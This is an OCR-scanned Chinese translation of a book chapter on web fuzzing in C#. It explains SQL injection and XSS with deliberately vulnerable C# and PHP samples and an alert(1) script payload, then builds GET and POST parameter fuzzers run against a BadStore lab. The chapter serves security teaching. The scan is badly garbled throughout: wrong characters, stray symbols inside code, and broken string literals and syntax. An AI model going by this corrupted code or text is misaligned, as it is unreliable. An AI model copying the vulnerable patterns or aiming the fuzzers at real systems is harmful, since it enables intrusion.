有 时 程序 员 需 要 动态 的 SQL 语句 (也 就 是 说 ， 根 据 用 户 与 Web 应 用 程序 的 交互 进行 更 改 ) 。 例 如 ， 程 序 员 可 能 需要 基于 一 
个 特定 用 户 的 ID 从 数据 库 中 选择 信息 。 


但 是 ， 当 程序 员 使 用 一 个 来 自 不 可 信 的 客户 闯 (如 Web 浏 唤 器 ) 的 用 户 提供 的 值 构建 SQL 语句 时 ， 如 果 这 个 值 没有 经 过 适 
当 的 检查 可 能 会 引发 SQL 注入 漏洞 。 例 如 ， 清 单 2-2 所 示 的 C#SOAP 方 法 可 能 用 于 将 用 户 播 入 到 托管 在 Web 服 务 器 上 的 数据 库 。 
(Simple Object Access Protocol，SOAP， 是 一 种 基于 XML 的 在 Web 应 用 程序 上 快速 创建 API 的 Web 技 术 ， 它 在 C# 和 Java 等 
在 企业 中 常用 的 编程 语言 中 很 受 欢 迎 ) 。 


清单 2-2: 易 受 SQL 注入 攻击 的 C#SOAP 广 法 


[WebMethod | 
public string AddUser(string username, string password ) 


| 


NpgsqlConnection conn = new NpgsqlConnection( connstr); 
conn.Open(); 


string sql = "insert into users values('{0}'", '{1}');"; 
@sql = String.Format(sql, username, password); 

NpgsqlCommand command = new NpgsqlCommand(sql, conn); 
@command.ExecuteNonQuery(); 


conn.Close(); 
return "Excellent!"; 


} 


在 这 种 情况 下 ， 程 序 员 没 有 在 创建 @ 并 执行 ODSQL 语 句 之 前 检查 用 户 名 和 密码 。 因 此 ， 攻 击 者 可 以 构造 用 户 名 或 密码 字符 串 
使 得 数据 库 运 行 精心 制作 的 能 让 他 们 执行 远程 命令 和 完全 控制 数据 库 的 SQL 代码。 


如 果 你 要 给 其 中 一 个 参数 传递 一 个 单 引 号 (比如 user'name 而 不 是 username) ，Execute-NonQuery () 方法 会 尝试 运行 
一 个 无 效 的 SQL 查询 (如 清单 2-3 所 示 ) 。 那 么 攻击 者 将 在 HTTP 响 应 中 看 到 方法 抛 出 的 异常 。 


清单 2-3: 用 户 提供 的 未 经 检查 的 数据 导致 SQL 得 询 无 效 


insert into users values( user ' name ` ， 'password'); 


许多 局 用 数据 库 访 问 的 软件 库 通 过 参数 化 查询 允许 程序 安全 地 使 用 如 Web 浏 览 器 这 种 不 受信 任 的 客 尸 端 提供 的 值 。 这 些 库 


通过 转 义 字符 自动 清除 任何 不 受信 任 的 传递 给 SQL 查询 的 值 (例如 单 引 号 、 括 号 和 SQL 语法 中 使 用 的 其 他 特殊 字符 ) 。 人 参数 化 得 
询 和 其 他 像 NHibernate 这 样 的 对 象 关 系 映 射 (Object Relational Mapping，ORM) 库 有 助 于 防止 这 些 SQL 注 入 问题 。 


这 些 用 户 提供 的 值 倾向 于 在 WHERE 子 句 中 使 用 SQL 查询 ， 如 清单 2-4 所 示 。 


清单 2-4: 根据 特定 的 user_ id 从 数据 库 中 选择 一 行 的 SQL SELECT 语句 示例 


SELECT * FROM users WHERE user id = 1 


如 清单 2-3 所 示 ， 将 单 引号 放 在 用 于 构建 动态 3QL 碍 询 之 前 没有 被 适当 检查 的 HTTP 参 数 中 可 能 会 导致 Web 应 用 程序 抛 出 一 
个 错误 (比如 HTTP 返 回 码 为 500) ， 因 为 SQL 中 的 单 引号 表示 字符 串 的 开头 或 结尾 。 单 引号 通过 过 早 地 结束 一 个 字符 串 或 者 通 
过 开始 一 个 没有 结尾 的 字符 串 使 得 SQL 语句 无 效 。 通 过 解析 这 样 请 求 的 HTTP 啊 应 ， 我 们 可 以 对 这 举 Web 应 用 程序 进行 模糊 测试 
并 搜索 用 户 提 供 HTTP 参 数 。 当 参数 航 复 改 时 ， 会 造成 啊 应 中 的 9QL 钳 误 。 


2.3 ” 跨 站 脚本 攻击 


像 SQL 注 入 一 样 ， 跨 站 脚本 攻击 利用 程序 员 使 用 从 Web 浏 览 器 传递 到 服务 器 的 数据 ， 构 建 要 在 Web 浏 哆 器 呈现 的 HTML 代 
码 中 的 漏洞 。 


有 了 时， 由 不 受信 任 的 客户 病 (如 Web 浏 览 器 ) 提供 的 数据 到 达 服 务 器 时 可 能 包含 如 Javascript 的 HTML 代 码 ， 允 许 攻击 者 穷 
取 cookies 或 者 使 用 未 经 检查 的 HTML 将 用 户 重 定向 到 恶意 网 站 。 


例如 ， 人 允许 发 表 评 论 的 博客 可 能 会 在 向 站 点 的 服务 器 发 送 HTTP 请 求 时 携带 评论 中 的 数据 。 如 果 攻 击 者 使 用 嵌入 式 HTML 或 
Javascript 创 建 亚 意 评 论 并 且 在 浏览 器 中 提交 评论 时 博客 软件 没有 进行 相应 的 检查 ， 那 么 攻击 者 可 以 使 用 他 们 加 载 的 恶意 评论 用 
目 己 的 HTML 代 和 码 破坏 网 站 或 者 将 任何 博客 的 访问 者 重 定 同 到 攻击 者 目 己 的 网 站 。 之 后 攻击 者 可 能 会 在 访问 者 的 机 器 上 安 委 恶意 
软件 。 


一 般 来 襄 ， 一 种 快速 检测 网 站 中 的 代码 是 否 容 


爷 
染 的 数据 出 现在 响应 中 而 没有 更 改 ， 那 么 你 可 能 已 经 找 
清单 2-5 所 示 。 


乏 
又 


以 ss 攻击 的 方法 是 使 用 一 个 被 污染 的 参数 向 网 站 友 出 一 个 请 求 。 如 果 污 
上 了 一 个 XSs 向 量 。 例 如 ， 假 设 你 给 HTTP 请 求 的 参数 传递 了 <xss> ， 如 


[| 


清单 2-5: 使 用 查询 字符 串 参 数 同 PHP 肢 本 友 送 Get 请 求 的 例子 


GET /index.php?name=Brandon<xss> HTTP/1.1 

Host: 10.37.129.5 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; TV:37.0) Gecko/20100101 Firefox/37.C 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Connection: keep-alive 


服务 器 返回 类 似 清单 2-6 中 HTTP 响 应 的 内 容 。 


清单 2-6: 来 自 PHP 脚 本 检查 name 查 询 字 符 串 参数 的 响应 示例 


HTTP/1.1 200 OK 

Date: Sun, 19 Apr 2015 21:28:02 GMT 
Server: Apache/2.4.7 (Ubuntu) 
X-Powered-By: PHP/5.5.9-1ubuntu4.7 
Content-Length: 32 

Keep-Alive: timeout=5, max=100 
Connection: Keep-Alive 
Content-Type: text/html 


Welcome Brandon&lt;xss&gt;<br /> 
如 果 代 码 <xss> 被 替换 为 具有 HTML 实 体 的 版 本 ， 你 应 该 知道 该 网 站 使 用 例如 html-specialchars () 这 样 的 PHP 函 数 或 类 似 
的 方法 。 但 是 如 果 网 站 在 响应 中 返回 <xss> ， 你 就 知道 它 不 执行 任何 过 滤 或 检查 ， 如 清单 2-7 所 示 的 HTTP name 参 数 。 
清单 2-7: 易 受 XSS 攻 击 的 PHP 代 码 
<?php 
$name = $ GOET[ name ]; 


@echo "Welcome $name<br>"; 
?> 


与 代码 清单 2-1 中 易 受 SQL 注 入 的 代码 一 样 ， 在 呈现 HTML 代 码 @ 之 前 没有 对 参数 进行 过 渡 或 替换 任何 潜在 的 坏 字符 。 通 过 
将 精心 制作 的 name 参 数 传递 给 Web 应 用 程序 ， 我 们 可 以 把 HTML 代 码 演 染 到 屏幕 ， 执 行 JavaScript 代 码 ， 甚 至 运行 试图 接管 计 
算 机 的 Java 小 程序 。 例 如 ， 我 们 可 以 友 送 一 个 如 清单 2-8 所 示 的 精心 制作 的 网 址 。 


清单 2-8: 具有 得 询 字 人 符 串 参数 的 URL， 如 果 访 参数 易 受 XS99 影 响 ， 则 会 弹出 Javascript 警 报 杠 


www.example.com/vuln.php?name=Brandon<script>alert(1)</script> 


如 果 PHP 脚 本 使 用 name 参 数 构建 一 些 最 终 将 在 Web 浏 览 器 中 被 泻 染 的 HTML 代 码 则 清单 2-8 中 的 URL 可 能 会 导致 javaScript 


弹出 一 个 窗口 显示 数字 1。 


2.4 ”使 用 基于 突变 的 模糊 测试 工具 对 GET 参 数 进 行 模糊 测试 


既然 你 了 解 了 SQL 注入 和 X9s 漏 洞 的 基础 知识 ， 让 我 们 实现 一 个 快速 的 模糊 测试 工具 在 得 询 字 符 串 参数 中 挖掘 潜 人 在 的 SQL 注 
入 或 XSs 漏 洞 。 碍 询 字 符 串 参数 是 URL 中 ”后 面 的 参数 ， 格 式 为 key=value。 我 们 会 专注 于 GET 请 求 中 的 HTTP 参 数 ， 但 是 首先 我 
们 将 分 解 一 个 URL 以 循环 遍历 任何 HTTP 查 询 字 符 串 参数 ， 如 清单 2-9 所 示 。 


清单 2-9: 一 个 小 的 分 解 给 定 URL 中 的 查询 字符 串 参数 Main () 方法 


public static void Main(string[] args ) 
{ 
@string url = args[0}]; 
int index = url.@Index0Of("?"); 
string[] parms = url.@Remove(0, index+1).@Split('&'); 
foreach (string parm in parms) 
Console.WriteLine(parm); 


在 清单 2-9 中 ， 我 们 将 第 一 个 参数 (args[0]) 传递 给 模糊 测试 程序 的 main 方 法 ， 并 假设 它 是 一 个 查询 字符 串 中 有 一 些 可 以 
进行 模糊 测试 的 HTTP 参 数 的 URLO。 为 了 使 得 参数 可 迁 代 ， 删 除 任何 直到 URL 中 的 问号 (? ) 的 字符 ， 并 使 用 
IndexOf ("?") @ 来 确定 第 一 个 问号 的 位 置 ， 这 表示 URL 已 经 结束 ， 后 面 是 我 们 可 以 解析 的 查询 字符 串 参 数 。 


调用 Remove (0，index+1) @ 返 回 一 个 仪 包含 URL 人 参数 的 字符 串 。 这 个 字符 串 然后 羽 '& 字符 @@ 分 隔 ， 它 标志 着 新 参数 的 
开始 。 最 后 ， 我 们 使 用 foreach 关 键 字 刀 历 parms 数 组 中 的 所 有 字符 串 ， 并 打印 每 个 参数 和 它 的 值 。 我 们 现在 已 经 从 URL 中 隔离 
了 字符 串 参 数 和 它们 的 值 ， 这 样 我 们 可 以 在 生成 HTTP 请 求 时 开始 改变 这 些 值 以 引发 Web 应 用 程序 的 错误 。 


2.4.1 ”污染 参 效 和 测试 涡 洞 


现在 我 们 已 经 分 离 了 可 能 易 受 攻击 的 任何 URL 参 数 ， 下 一 步 是 污染 这 些 参数 ， 如 果 服 务 器 不 容易 受到 XSS 或 SQL 注 入 的 攻 
击 ， 那 么 服务 器 会 恰当 地 检查 这 些 数据 。 向 污染 数据 添加 <xss> ， 并 且 测 试 SQL 注 入 的 数据 将 具有 单 引 号 。 


可 以 将 URL 中 的 已 知 的 正确 的 参数 值 蔡 换 为 测试 XSS 和 SQL 注 入 漏洞 的 污染 数据 来 创建 两 个 新 的 URL 测 试 目标 ， 如 清单 2-10 
所 示 。 


清单 2-10: 修改 foreach 循 环 用 污染 数据 替换 参数 


foreach (string parm in parms) 


{ 
@string xssUrl = url.Replace(parm, parm + "fd<xss>sa"); 
@string sqlUrl = url.Replace(parm, parm + "fd'sa"); 


Console.WriteLine(xssUr]1); 
Console.WritelLine(sqlUr]); 


} 


为 了 测试 漏洞 ， 我 们 需要 确保 正在 创建 目标 网 站 能 理解 的 URL。 为 了 做 到 这 一 点 ， 首 先 用 污染 数据 蔡 换 | 旧 的 参数 ， 然 后 打印 
将 请 求 的 新 的 URL。 当 打印 到 屏幕 时 ， 每 个 URL 人 参数 应 该 舍 有 测试 XSs 的 数据 @ 的 一 行 和 含有 单 引 号 @ 的 一 行 ， 如 清单 2-11 所 


泵 。 
清单 2-11: 打印 包含 污染 的 HTTP 参 数 的 URL 


http://192.168.1.75/cgi-bin/badstore.cgi?searchquery=testfd<xss>sa&action=search 
http://192.168.1.75/cgi-bin/badstore.cgi?searchquery=testfd’' sa&action=search 
--S1hIp-- 


2.4.2 ”构造 HTTP 请 求 


接 下 来 ， 使 用 HttpWebRequest 类 编程 构建 HTTP 请 求 ， 然 后 我 们 使 用 市 有 污染 HTTP 人 参数 友 起 HTTP 请 求 ， 看 看 是 否 有 任何 
首 误 返回 ( 见 清单 2-12) 。 


清单 2-12: 完整 的 foreach 循 环 测试 给 定 URL 是 否 存 在 XSS 和 SQL 注 入 


foreach (string parm in parms) 


{ 


string xssUrl = url.Replace(parm, parm + "fd<xss>sa"); 

string sqlUrl = url.Replace(parm, parm + "fd'sa"); 

HttpWebRequest request = (HttpWebRequest)WebRequest.@Create(sqlUr]); 
request.@Method = “GET'; 


string sqlresp = string.Empty; 

using (StreamReader rdr = new 
StreamReader(request.GetResponse().GetResponseStream( ))) 

sqlresp = rdr.®@ReadToEnd(); 


request = (HttpWebRequest)WebRequest.Create(xssUr]); 
request.Method = "GET"; 
string xssresp = string.Empty,; 


using (StreamReader rdr = new 
StreamReader(request.GetResponse().GetResponseStream( ) ) ) 
xssresp = rdr.ReadToEnd(); 


if (xssresp.Contains("<xss>")) 
Console.WriteLine("Possible XSS point found in parameter: 


+ parm); 


if (sqlresp.Contains("error in your SQL syntax")) 
Console.WriteLine("SOL injection point found in parameter: ”+ parm); 


在 清单 2-12 中 ， 使 用 WebRequest 类 中 的 静态 Create () 方法 @ 进 行 HTTP 请 求 ， 将 用 单 引号 污染 过 的 URL 作 为 参数 传递 给 
sqlUrl 变 量 ， 我 们 把 返回 的 WebRequest 实 例 转化 为 HttpWebRequest (不 实例 化 父 类 束 可 以 用 静态 的 方法 ) 。 静 态 Create () 
方法 基于 传递 的 URL 使 用 工厂 异 式 来 创建 新 的 对 象 ， 这 融 是 为 什么 我 们 需要 将 返回 的 对 象 转换 为 一 个 HttpWebRequest 对 象 。 举 
个 例子 ， 如 果 我 们 传递 了 一 个 以 ftp: // 或 file: // 为 前 缀 的 URL， 那 么 Create () 方法 返回 的 对 象 类 型 会 是 一 个 不 同 的 类 

(FtpWebRequest 或 FileWeb-Request) 。 之 后 我 们 将 HttpWebRequest 的 Method 属 性 设置 为 GET (所 以 我 们 做 一 个 GET 请 
求 ) @ 并 使 用 StreamReader 类 和 ReadToEnd () 方法 @ 将 请 求 的 响应 保存 在 resp 字 符 串 中 。 如 果 响 应 包含 未 检查 的 XSS 有 效 载 
傈 或 引 友 关于 SQL 的 语法 错误 ， 残 代表 我 们 可 能 已 经 友 现 了 一 个 漏洞 。 


注意 : 我 们 在 这 里 以 新 的 方式 使 用 using 关 键 字 。 在 此 之 前 ， 我 们 使 用 using 将 命名 空间 (如 System.Net) 中 的 类 时 入 到 模糊 测 
试 工具 中 。 实 质 上 ， 当 类 实现 [Disposable 接 口 (需要 一 个 类 来 实现 一 个 Dispose () 方法 ) 时 ， 实 例 化 的 对 象 〈 使 用 new 关 键 字 创 
建 的 对 象 ) 可 以 以 这 种 方式 在 using 块 的 上 下 文中 使 用 。 当 using 块 的 范围 结束 时 ， 对 象 上 的 Disposes () 方法 将 自动 被 调用 。 这 是 
管理 可 能 导致 资源 泄露 的 资源 范围 (例如 网 络 资源 或 文件 描述 符 ) 的 非常 有 用 的 方式 。 


2.4.3 ”测试 模糊 测试 的 代码 


用 Badstore 首 页 上 的 搜索 字段 来 测试 我 们 的 代码 。 在 Web 浏 览 器 中 打开 BadSstore 应 用 程序 后 ， 单 击 页 面 左 侧 的 主页 菜单 
项 ， 然 后 在 左上 角 的 搜索 框 中 进行 快速 搜索 。 你 应 该 在 浏览 器 中 看 到 类 似 于 清单 2-13 所 示 的 URL。 


清单 2-13: BadStore 搜 索 页 面 的 示例 URL 


http://192.168.1.75/cgi-bin/badstore.cgi?searchquery=test&action=search 
传递 清单 2-13 中 的 URL (将 IP 地 址 替换 为 网 络 上 的 BadStore 实 例 的 IP 地 址 ) 作为 命令 行 上 的 参数 ， 如 清单 2-14 所 示 ， 就 会 
开始 进行 模糊 测试 。 
清单 2-14: 运行 XSS 和 SQL 注 入 模糊 测试 工具 


$ ./fuzzer.exe “http://192.168.1.75/cgi-bin/badstore.cgi?searchquery=test&action=search" 
SOL injection point found in parameter: searchquery=test 
Possible XSS point found in parameter: searchquery=test 


Eee 


运行 我 们 的 模糊 测试 工具 应 该 会 在 BadStore 中 同时 发 现 SQL 注 入 和 XSS 漏 洞 ， 输 出 类 似 于 清单 2-14。 


2.5 ”对 POST 请 求 进 行 模糊 测试 


在 本 世 中 ， 我 们 将 使 用 BadStore 对 POST 请 求 (用 于 提交 数据 到 Web 人 资源 的 请 求 ) 的 参数 进行 模糊 测试 并 保存 到 本 地 硬盘 
驱动 器 。 我 们 将 使 用 Burp Suite 捕 获 POST 请 求 一 一 它 是 一 个 专 为 安全 研究 人 员 和 渗透 测试 人 员 设 计 的 易于 使 用 的 HTTP 代 理 ， 
位 于 浏览 器 和 HTTP 服 务 器 之 间 ， 以 便 查 看 来 回 友 送 的 数据 。 


现在 从 http://www.portswigger.net/ 下 载 并 安装 Burp Suite。 (Burp Suite 是 一 个 可 以 保存 到 U 盘 或 其 他 便携式 存储 设备 
的 JAR 文 件 。) 一 旦 Burp Suite 下 载 完 成 ， 使 用 如 清单 2-15 所 示 的 Java 命 令 启 动 它 。 


清单 2-15: 从 命令 行 运行 Burp Suite 


cd /Downloads/ 
$ java -jar burpsuite*.jar 


一 旦 启动 ，Burp Suite 代 理应 该 监听 8080 端 口 。 
将 Firefox 的 流量 设置 为 使 用 Burp Suite 代 理 ， 如 下 所 示 : 
1. 在 Firefox 中 ， 选 择 Edit-> Preferences。 应 显示 高 级 对 话 框 。 


2.] 先 择 Network 选 项 卡 ， 如 图 2-3 所 示 。 


Network 


图 2-3 Firefox 首 选项 中 的 Netwo 全 选项 卡 


3. 单 击 Settings 打 开 连 接 设 置 对 话 框 ， 如 图 2-4 所 示 。 


localhost, 127.0.0.1 


图 2-4 ”连接 设置 对 话 框 


4. 选 择 Manual proxy configuration， 并 在 HTTP 代 理 字段 输入 127.0.0.1， 端 口 字段 输入 8080。 单 击 OK， 然 后 关闭 连接 设 
置 对 话 框 。 


现在 通过 Firefox 发 送 的 所 有 请 求 都 应 该 首先 通过 Burp Suite。 (要 测试 这 一 点 ， 请 访问 http://google.com/， 你 应 该 在 
Burp Suite 的 请 求 窗 格 中 看 到 请 求 ， 如 图 2-5 所 示 。 ) 


Burp Suite Free Edition v1.6 


ey pe Repeater Window Help 
[Target| [Spider [ Scanner [ Intruder [ Repeater [ Sequencer | Decoder [ Comparer [ Extender [ Options [Alerts | 
7 [HmPhistory | websockets history | Options ， 


Li Request to http:/ /goo0gle.com:80 [216.58.218.206] 


rep on 日 


GET / HITPB/1.] 

Host: google.com 

User-2dgent: Mozilla/5s.0 ‘iMacintosh; Intel Mac DB XX 10.10; rv:26.0) Gecko/20100101 Fireftox/26.0 
Lccept: text/htm ,application/ x*htmlt+xrml :applicaticon x ; d=0 .9,*+/* ;=0 .8 

CCEPt-Landguadge: en-US,en;d=0 .5 

Lccept-—-Encodindg: dgzip, detlate 

connection: keep-alive 


Ee Ee Ee ed 0 matches 


图 2-5 Butrp Suite 从 Firefox 捕 获 访 问 google.com 请 求 


单 击 Burp Suite 中 的 Forward 按 钮 将 转 友 请 求 (在 本 例 中 为 Google) ， 并 将 响应 返回 给 Firefox。 


2.5.1 编号 一 个 对 POST 请 求 进行 模糊 测试 的 工具 


我 们 将 根据 BadStore 的 “What” s New” 页 面 ( 见 图 2-6) 编写 和 测试 我 们 的 对 POST 请 求 进 行 模糊 测试 的 工具 。 在 
Firefox 中 浏览 此 页 面 ， 然 后 单 击 左 侧 的 What” s New 菜 单项 。 


Whats New at BadStore.met 


[四 -| (号 | | 


BADSTORE.NET 


Quick ltem Search sicome {Unregistered User} - Cart contains 0 items at $0.00 View Cart 
EE p= 


Ee The following are new items: 


hat's New 


iew Previous Orders 
About Us Useless but 
1000 Snake OIl expensive 


Magic Rabbit /Cute white bunny 12.50 


图 2-6 ”BadStore Web 应 用 程序 的 “What s New 项 目 页 面 


页 面 底部 的 按钮 用 于 将 检查 项 目 添 加 到 购物 和 车 。 使 用 位 于 浏览 器 和 Badstore 服 务 器 乙 间 的 Burp Suite， 在 页 面 右 侧 的 复 选 
框 选择 一 些 项 目 ， 然 后 单 击 Submit 以 局 动 HTTP 请 求 将 物品 添加 到 购物 车 。 在 Burp Suite 中 捕获 提交 请 求 结果 如 清单 2-16 所 示 。 


清单 2-16: Burp Suite 的 HTTP POST 请 求 


POST /cgi-bin/badstore.cgi?action=cartadd HTTP/1.1 


Host: 192.168.1.75 
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86 64; TV:20.0) Gecko/20100101 Firefox/20.0 


Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 


Referer: https://192.168.1.75/cgi-bin/badstore.cgi?action=whatsnew 
Connection: keep-alive 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 63 


cartitem=1000&cartitem=1003&Add+Items+to+Cart=Add+Items+to+Cart 


清单 2-16 所 示 的 请 求 是 具有 URL 编 码 (一 组 特殊 字 待 ， 其 中 一 些 是 空 日 字符 ， 如 空格 和 换行 符 ) 的 参数 的 典型 POST 请 求 。 
请 注意 ， 此 请 求 使 用 加 号 (+) 而 不是 空格 。 将 此 请 求 保存 到 文本 中 。 稍 后 我 们 将 使 用 它 来 系统 地 对 HTTP POST 请 求 中 友 大 的 
参数 进行 模糊 测试 。 

注意 : HTTP POST 请 求 中 的 参数 包含 在 请 求 的 最 后 一 行 中 ， 该 参数 定义 了 以 键 / 值 形式 发 布 的 数据 。 (有 些 POST 请 求 发 布 


multipart/form-data 或 其 他 类 型 的 数据 ， 但 一 般 的 规则 保持 不 变 。) 


请 注意 在 此 请 求 中 我 们 将 ID 为 1000 和 1003 的 物品 添加 到 购物 车 。 现 在 看 看 Firefox 窗 口 ， 你 应 该 注意 到 这 些 数 字 对 应 于 
ltemNum 列 。 我 们 正在 连同 这 些 1D 提 交 一 个 参数 ， 实 际 上 是 在 告诉 应 用 程序 如 何 处 理 我 们 友 送 的 数据 (即将 物品 添加 到 购物 
车 ) 。 你 可 以 看 到 ， 唯 一 可 能 存在 SQL 注 入 的 参数 是 两 个 cartitem 参 数 ， 因 为 服务 器 将 解析 这 些 参 数 。 


2.5.2 ”开始 模糊 测试 


在 我 们 开始 对 POST 请 求 参数 进行 模糊 测试 之 前 ,我 们 需要 设置 一 些 数据 ， 如 清单 2-17 所 示 。 


清单 2-17: 读 取 POST 请 求 并 存储 Host 头 的 Main () 万 法 


public static void Main(string[|] args) 


{ 

string[ | requestLines = @File.ReadAllLines(args[0]); 
@string[] parms = requestLines[requestLines.Length - 1].Split('&'); 
@string host = string.Empty; 

StringBuilder requestBuilder = new @StringBuilder(); 


foreach (string ln in requestLines) 


if (ln.StartsWith("Host:")) 
host = ln.Split(' ')[1].@Replace("\r", string.Empty); 


requestBuilder.Append(ln + "\n"); 
} 


string request = requestBuilder.ToString() + "\r\n"; 
Console.WritelLine(request); 


} 


我 们 使 用 File.ReadAllLines () 从 文件 读 取 请 求 ， 并 将 第 一 个 参数 作为 ReadAllLines () @ 的 参数 传递 给 模糊 测试 程序 。 我 
们 使 用 ReadAllLines () 而 不 是 ReadAllText () ， 因 为 需要 拆 分 请 求 ， 以 便 在 模糊 测试 之 前 获取 信息 ( 即 Host 头 ) 。 在 将 请 求 
逐 行 读 入 字符 串 数组 并 从 文件 的 最 后 一 行 获取 参数 @ 后 ， 我 们 声明 两 个 变量 。hostG@ 变 量 人 存储 太 送 请 求 的 主机 的 IP 地 址 。 下 面 声 
明 的 是 一 个 System.Text.stringBuilder@@， 我 们 将 使 用 它 作为 单个 字符 串 来 构建 完整 的 请 求 。 


注意 : 我 们 使 用 一 个 SttingBuilder， 因 为 它 比 使 用 基本 字符 串 类 型 的 += 运 算 符 更 有 效 (每 次 调用 += 运 算 符 时 ， 都 在 内 存 中 创 
建 一 个 新 的 字符 串 对 象 ) 。 在 这 样 的 小 文件 上 ， 你 不 会 注意 到 区 别 ， 但 是 当 在 内 存 中 处 理 很 多 字符 串 时 ， 你 就 会 注意 到 了 。 使 用 
SttingBuilder 只 在 内 存 中 创建 一 个 对 象 ， 从 而 减少 了 内 存 开 销 。 


现在 我 们 循环 遍历 先前 读 入 的 请 求 中 的 每 行 。 我 们 检查 行 是 否 以 “Host: ”开头 ， 如 果 是 则 将 主机 字符 串 的 后 半 部 分 分 配 
给 host 变 量 。 (这 应 该 是 一 个 |P 地 址 。) 然后 我 们 调用 字符 串 中 的 Replace () @@ 来 删除 Mono 一 些 版 本 可 能 留 下 的 \r， 因 为 一 
个 IP 地 址 中 没有 \r。 最 后 ， 我 们 将 \r\n 附 加 到 StringBuilder。 构 建 完整 的 请 求 后 ， 我 们 将 其 分 配给 一 个 名 为 request 的 新 的 字符 
串 变 量 。 (HTTP 请 求 必须 以 \r\n 结 尾 ， 否 则 ， 服 务 器 响应 将 挂 起 。) 


2.5.3 ”对 参数 进行 异 糊 测试 


现在 我 们 有 完整 的 待 发 送 的 请 求 ， 我 们 需要 循环 尝试 对 SQL 注入 的 参数 进行 模糊 测试 。 在 这 个 循环 中 ， 我 们 将 使 用 
System.Net.Sockets.Socket 和 System.Net.|PEndPoint 类 。 因 为 我 们 将 完整 的 HTTP 请 求 作 为 一 个 字符 串 ， 可 以 使 用 一 个 基本 
的 套 接 字 来 与 服务 器 通信 而 不 依靠 HTTP 库 为 我 们 创建 请 求 。 现 在 我 们 有 对 服务 器 进行 模糊 测试 所 需 的 一 切 ， 如 清单 2-18 所 示 。 


清单 2-18: 添加 到 Main () 方法 的 对 POST 参数 进行 模糊 测试 的 额外 的 代码 


IPEndPoint rhost = @new IPEndPoint(IPAddress.Parse(host), 80); 
foreach (string parm in parms) 


using (Socket sock = new @Socket(AddressFamily.InterNetwork, 
SocketType.Stream, ProtocolType.Tcp)) 


sock.@Connect (rhost); 


string val = parm.@Split('="')[1]; 
string req = request.@Replace("=" 


+ Val, + val + "'"); 


byte[ ] reqBytes = @Encoding.ASCIIT.GetBytes(req); 
sock.@Send(reqBytes); 


byte[ | buf = new bytel[sock.ReceiveBufferSize|; 


sock.@Receive(buf); 

string response = ©Encoding.ASCIIT.GetString(buf); 

if (response.Contains("error in your SQOL syntax")) 
Console.WritelLine("Parameter ”+ parm + " seems vulnerable"); 
Console.Write(" to SOL injection with value: " + val + "'"); 


在 清单 2-18 中 ， 我 们 通过 传递 一 个 新 的 IPAddress.Parse (host) 返回 的 IPAddress 对 象 和 我 们 将 要 连接 到 IP 地 址 的 端口 
(80) 来 创建 一 个 新 的 IPEndPoint 对 象 。 现 在 我 们 可 以 循环 声 历 之 前 从 requestLines 变 量 抓 取 的 参数 。 对 于 每 次 迭 代 ， 我 们 
需要 创建 一 个 新 的 Socket 连 接 @ 到 服务 器 ， 我 们 使 用 AddressFamily.InterNetwork 告 诉 套 接 字 使 用 IPv4 协 议 (版 本 4 的 互联 网 
协议 ,而 不 是 IPv6) ， 并 使 用 SocketType.Stream 来 告诉 套 接 字 使 用 一 个 流 套 接 字 (有 状态 的 ， 双 向 ， 可 靠 ) 。 我 们 还 使 用 
ProtocolType.Tcp 告 诉 套 接 字 要 使 用 的 协议 是 TCP。 


一 旦 该 对 象 被 实例 化 ， 我 们 可 以 通过 传递 IPEndPoint 对 象 rhost 作 为 参数 来 在 它 之 上 调用 Connect () @。 连 接 到 端口 80 上 
的 远程 主机 之 后 ， 融 可 以 开始 对 参数 进行 模糊 测试 。 使 用 等 号 (=) 作为 标志 @ 分 隅 来 自 foreach 循 环 的 参数 ， 使 用 数组 中 第 二 
个 索引 的 值 (由 方法 调用 生成 ) 提取 该 参数 的 值 。 然 后 调用 request 字 符 串 的 Replace () @ 方 法 把 原始 值 蔡 换 成 一 个 污染 过 的 
值 。 例 如 ， 如 果 我 们 的 值 在 参数 字符 串 “blah=foo&blergh=bar 中 是 “foo” ， 那 么 我 们 将 foo 蔡 换 为 foo”( 请 注意 附加 到 
foo 末 尾 的 单 引 号 ) 。 


接 下 来 ， 我 们 使 用 Encoding.AsCll.GetBytes () @ 获 取 一 个 表示 字符 串 的 字 世 数组 ， 我 们 通过 和 套 接 字 @ 将 它 友 送 到 在 
IPEndPoint 构 造 亢 数 中 指定 的 服务 器 靖 口 。 这 相当 于 从 你 的 Web 浏 览 器 向 地 址 栏 中 的 URL 友 出 请 求 。 


发 送 请 求 后 ， 创 建 一 个 和 我 们 将 收 到 的 咽 应 大 小 相等 的 字 证 数组， 我们 将 使 用 Receive () @ 方 法 将 服务 器 的 啊 应 填充 到 之 
中 。 使 用 Encoding.ASCIl.GetString () @ 获 取 字 节 数 组 表示 的 字符 串 ， 然 后 可 以 解析 服务 器 的 响应 。 通 过 检查 响应 数据 中 的 
SQL 错 误 信息 来 检查 服务 器 的 响应 。 


我 们 的 模糊 测试 工具 应 该 输出 导致 SQL 错误 的 任何 参数 ， 如 清单 2-19 所 示 。 
清单 2-19: 对 请 求 中 POST 参数 进行 模糊 测试 的 输出 


$ mono POST fuzzer.exe /tmp/request 
Parameter cartitem=1000 seems vulnerable to SQL injection with value: 1000 
Parameter cartitem=1003 seems vulnerable to SQL injection with value: 1003 


$ 


正如 我 们 在 模糊 测试 工具 输出 中 可 以 看 到 的 那样 ，HTTP 参 数 cartitem 似 乎 存在 SQL 注 入 漏洞 。 在 当前 的 HTTP 参 数值 中 插入 
一 个 单 引 号 之 后 ， 在 HTTP 响 应 中 返回 一 个 SQL 错 误 ， 这 使 得 它 很 可 能 容易 受到 SQL 注 入 攻击 。 


2.6 ”对 JSON 进 行 模糊 测试 


作为 一 名 渗透 测试 人 员 或 安全 工程 师 ， 你 可 能 会 遇 到 以 某 种 形式 接受 将 数据 序列 化 为 JavaScript 对 象 符号 (JavaScript 
Object Notation，JSON) 作为 输入 的 Web 服 务 。 为 了 帮助 你 学 习 对 JSON HTTP 请 求 进行 模糊 测试 ， 我 写 了 一 个 名 为 
